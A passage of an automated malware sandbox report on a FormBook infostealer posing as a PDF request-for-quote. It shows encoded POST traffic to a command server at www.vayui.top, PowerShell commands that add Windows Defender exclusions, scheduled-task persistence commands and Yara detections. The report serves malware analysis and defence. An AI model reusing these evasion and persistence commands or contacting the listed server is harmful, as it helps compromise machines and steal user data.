                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dh8pRCmJ9wzbBH2kBSLCmJYeUh5ip957edlxIpNEYmVsLPqLVXTN2qL0PnP5oj8BrXkZM%2F1dGhJkusRmxnfD3HOI%2FHYgQVq5tBRRCUtY935BtySRcTb1C3awjUtvlE6jVRzAiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c63fabbf423f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=560&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 35 36 62 38 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 09 09 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 [TRUNCATED]
                                                                                  Data Ascii: 56b8<html lang=""><head><meta charset="utf-8"><meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cove" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="icon" href="favicon.ico"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="yes" name="apple-touch-fullscreen"><titl
                                                                                  Dec 9, 2024 07:00:22.050472975 CET1236INData Raw: 65 3e 61 63 74 69 6f 6e 61 72 65 6e 61 2e 74 6f 70 3a 20 57 68 65 72 65 20 68 61 70 70 69 6e 65 73 73 20 6d 65 65 74 73 20 69 6e 6e 6f 76 61 74 69 6f 6e 20 7c 20 4f 6e 6c 69 6e 65 20 47 61 6d 65 20 7c 20 46 72 65 65 20 47 61 6d 65 3c 2f 74 69 74
                                                                                  Data Ascii: e>actionarena.top: Where happiness meets innovation | Online Game | Free Game</title><link href="css/chunk-common.2627b58b.css" rel="preload" as="style"><link href="css/chunk-vendors.df919975.css" rel="preload" as="style"><link href="css
                                                                                  Dec 9, 2024 07:00:22.050487041 CET1236INData Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 74 61 67 2e 70 75 62 61 64 73 28 29 2e 65 6e 61 62 6c 65 53 69 6e 67 6c 65 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 74 61 67 2e 65 6e 61 62
                                                                                  Data Ascii: ; googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); </script> adEnd--><script>window.aiptag = window.aiptag || {cmd: []};aiptag.cmd.display = aiptag.cmd.display || [];a
                                                                                  Dec 9, 2024 07:00:22.050553083 CET1236INData Raw: 0a 09 09 09 69 66 20 28 74 79 70 65 6f 66 20 61 69 70 74 61 67 2e 61 64 70 6c 61 79 65 72 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 0a 09 09 09 09 61 69 70 74 61 67 2e 63 6d 64 2e 70 6c 61 79 65 72 2e 70 75 73 68 28 66 75 6e 63 74
                                                                                  Data Ascii: if (typeof aiptag.adplayer !== 'undefined') {aiptag.cmd.player.push(function() { aiptag.adplayer.startVideoAd(); });} else {//Adlib didnt load this could be due to an adblocker, timeout etc.//Please add your script here
                                                                                  Dec 9, 2024 07:00:22.050565958 CET1236INData Raw: 09 09 09 09 09 09 48 6f 6d 65 0a 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 61 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 68 72 65 66 3d 22 73 65 61 72 63 68 2e 68
                                                                                  Data Ascii: Home</span></div></a><a data-v-49759819="" href="search.html?type=Popular" class="type_item" style="display: none;"></a><a data-v-49759819="" href="search.html?type=Girls" class="type_item"><div data-v-497
                                                                                  Dec 9, 2024 07:00:22.050575972 CET1236INData Raw: 74 79 70 65 3d 52 61 63 69 6e 67 22 20 63 6c 61 73 73 3d 22 74 79 70 65 5f 69 74 65 6d 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 64 61 74 61 2d 76 2d 34 39 37 35
                                                                                  Data Ascii: type=Racing" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img/racing.1bfb9b83.png" data-src="img/racing.1bfb9b83.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class
                                                                                  Dec 9, 2024 07:00:22.050604105 CET1236INData Raw: 72 65 6d 3b 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 69 74 65 6d 5f 6e 61 6d 65 22 3e 0a 09 09 09 09 09 09 53 70 6f 72 74 73 0a 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a
                                                                                  Data Ascii: rem;"><span data-v-49759819="" class="item_name">Sports</span></div></a><a data-v-49759819="" href="search.html?type=Action" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" sr
                                                                                  Dec 9, 2024 07:00:22.050723076 CET1236INData Raw: 72 22 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22 3e 0a 09 09 09 09 09 3c 73 76 67 20 64 61 74 61 2d 76 2d 34 39 37 35
                                                                                  Data Ascii: r" class="header"><div data-v-49759819="" class="menu"><svg data-v-49759819="" t="1687244222935" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="19883" xmlns:xlink="http://www.w3.org/1999/xlink"
                                                                                  Dec 9, 2024 07:00:22.050750017 CET1236INData Raw: 09 09 3c 61 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 68 72 65 66 3d 22 73 65 61 72 63 68 2e 68 74 6d 6c 3f 71 3d 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 22 3e 0a 09 09 09 09 09 3c 73 76 67 20 64 61 74 61 2d 76 2d 34 39 37
                                                                                  Data Ascii: <a data-v-49759819="" href="search.html?q=" class="search"><svg data-v-49759819="" t="1687244550911" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="3078" data-spm-anchor-id="a313x.7781069.0.i2"
                                                                                  Dec 9, 2024 07:00:22.050764084 CET1236INData Raw: 70 75 74 20 64 61 74 61 2d 76 2d 30 35 34 34 37 39 33 66 3d 22 22 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 69 6e 70 75 74 20 74 68 65 20 6b 65 79 77 6f 72 64 73 22 20 63 6c 65 61 72 61 62 6c 65 3d 22 22 20 64
                                                                                  Data Ascii: put data-v-0544793f="" type="text" placeholder="input the keywords" clearable="" defaultvalue=""><div data-v-0544793f=""><svg data-v-0544793f="" t="1680079992751" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/
                                                                                  Dec 9, 2024 07:00:22.170301914 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 64 45 6e 64 2d 2d 3e 0a 09 09 09 09 09 3c 64 69 76 20 69 64 3d 27 61 63 74 69 6f 6e 61 72 65 6e 61 2d 74 6f 70 5f 33 30 30 78 32 35 30 27 3e 0a 09 09 09 09 09 3c 73 63 72 69 70 74
                                                                                  Data Ascii: adEnd--><div id='actionarena-top_300x250'><script type='text/javascript'>aiptag.cmd.display.push(function() { aipDisplayTag.display('actionarena-top_300x250'); });</script></div><div


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.2.750022172.67.145.234805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 07:00:27.745157957 CET817OUTPOST /ge5i/ HTTP/1.1
                                                                                  Host: www.vayui.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.vayui.top
                                                                                  Referer: http://www.vayui.top/ge5i/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 75 4e 38 55 45 2f 47 2b 45 4c 69 44 4f 5a 65 47 78 7a 45 78 6a 33 74 75 61 79 4b 42 53 65 6e 77 50 6a 31 4c 78 57 2f 36 75 48 2b 45 6f 4a 32 2f 75 68 39 79 63 6f 54 52 63 32 38 33 61 4a 32 71 66 77 69 53 2f 54 6e 6a 6e 62 73 70 6f 55 6f 58 4d 69 47 49 67 78 4e 33 76 58 71 56 6a 41 66 6c 55 32 51 4e 33 4c 46 4a 33 57 48 49 51 59 74 37 46 67 42 38 37 48 42 48 53 67 34 6d 36 64 73 6b 44 4a 67 57 52 50 41 67 6e 71 4b 61 46 38 78 57 2b 69 34 33 73 4a 57 6b 71 2f 56 32 2f 64 76 67 36 61 7a 36 51 77 65 6e 67 4c 53 49 6a 6b 6c 30 4a 47 32 6a 6a 35 70 6a 74 73 74 4a 61 63 2b 69 78 73 74 56 54 32 4c 34 32 54 51 54 4e 2f 69 4d 57 77 3d 3d
                                                                                  Data Ascii: PHM8hj-=uN8UE/G+ELiDOZeGxzExj3tuayKBSenwPj1LxW/6uH+EoJ2/uh9ycoTRc283aJ2qfwiS/TnjnbspoUoXMiGIgxN3vXqVjAflU2QN3LFJ3WHIQYt7FgB87HBHSg4m6dskDJgWRPAgnqKaF8xW+i43sJWkq/V2/dvg6az6QwengLSIjkl0JG2jj5pjtstJac+ixstVT2L42TQTN/iMWw==
                                                                                  Dec 9, 2024 07:00:28.970876932 CET964INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 06:00:28 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5n9htlE53RLATzMY9d8jJAh1SDks7HYQydUImQswIagl3ykdUIVmDAQ2hGQSTO39Q%2Baqsar64qYuG%2Fa4JT6pkJs7EhOa2D8rPEQskYrd%2BEgAz6vQ58eQ2sccnuwL5N2Z"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c66b2aea7c87-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=817&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  46192.168.2.750023172.67.145.23480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 07:00:32.115936041 CET837OUTPOST /ge5i/ HTTP/1.1
                                                                                  Host: www.vayui.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.vayui.top
                                                                                  Referer: http://www.vayui.top/ge5i/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 75 4e 38 55 45 2f 47 2b 45 4c 69 44 49 35 4f 47 79 53 45 78 32 48 74 74 55 53 4b 42 59 2b 6d 35 50 6a 70 4c 78 58 4b 68 75 54 53 45 6f 6f 6d 2f 70 6b 4a 79 5a 6f 54 52 58 57 38 76 55 70 32 78 66 77 76 78 2f 58 37 6a 6e 61 4d 70 6f 52 45 58 4e 52 2b 4a 69 68 4e 31 75 6e 71 74 39 77 66 6c 55 32 51 4e 33 50 74 76 33 58 76 49 54 6f 39 37 46 42 42 7a 33 6e 42 49 56 67 34 6d 2b 64 73 67 44 4a 68 73 52 4f 73 4b 6e 73 47 61 46 38 68 57 2f 7a 34 30 31 35 57 2b 6e 66 55 66 33 64 32 56 7a 35 50 48 5a 52 4b 67 69 4c 32 72 76 79 6b 57 54 6b 36 50 39 6f 52 59 70 75 4a 2f 4e 36 6a 58 7a 74 70 4e 65 55 2f 5a 70 6b 31 35 41 74 44 49 41 4e 57 47 52 72 47 59 78 45 4c 36 4e 35 75 39 4b 42 69 75 65 52 77 3d
                                                                                  Data Ascii: PHM8hj-=uN8UE/G+ELiDI5OGySEx2HttUSKBY+m5PjpLxXKhuTSEoom/pkJyZoTRXW8vUp2xfwvx/X7jnaMpoREXNR+JihN1unqt9wflU2QN3Ptv3XvITo97FBBz3nBIVg4m+dsgDJhsROsKnsGaF8hW/z4015W+nfUf3d2Vz5PHZRKgiL2rvykWTk6P9oRYpuJ/N6jXztpNeU/Zpk15AtDIANWGRrGYxEL6N5u9KBiueRw=


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:00:56:20
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                                                                                  Imagebase:0xf80000
                                                                                  File size:817'160 bytes
                                                                                  MD5 hash:198FADC2115110C8B0B774C88C70215E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:00:56:21
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                                                                                  Imagebase:0xa70000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:00:56:21
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff75da10000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:00:56:21
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                                                                                  Imagebase:0xa70000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:00:56:21
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff75da10000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:00:56:24
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff7fb730000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:13
                                                                                  Start time:00:56:25
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp"
                                                                                  Imagebase:0x700000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:14
                                                                                  Start time:00:56:25
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff75da10000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:15
                                                                                  Start time:00:56:25
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                                                                                  Imagebase:0xc10000
                                                                                  File size:817'160 bytes
                                                                                  MD5 hash:198FADC2115110C8B0B774C88C70215E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:20
                                                                                  Start time:00:56:28
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                                                                                  Imagebase:0x350000
                                                                                  File size:817'160 bytes
                                                                                  MD5 hash:198FADC2115110C8B0B774C88C70215E
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 50%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:21
                                                                                  Start time:00:56:32
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp"
                                                                                  Imagebase:0x700000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:22
                                                                                  Start time:00:56:32
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff75da10000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:23
                                                                                  Start time:00:56:33
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                                                                                  Imagebase:0x480000
                                                                                  File size:817'160 bytes
                                                                                  MD5 hash:198FADC2115110C8B0B774C88C70215E
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:24
                                                                                  Start time:00:56:34
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe"
                                                                                  Imagebase:0xe20000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:26
                                                                                  Start time:00:56:36
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\SysWOW64\msinfo32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                                                                  Imagebase:0x890000
                                                                                  File size:338'432 bytes
                                                                                  MD5 hash:5C49B7B55D4AF40DB1047E08484D6656
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:27
                                                                                  Start time:02:14:04
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe"
                                                                                  Imagebase:0xe20000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:29
                                                                                  Start time:02:14:17
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff722870000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
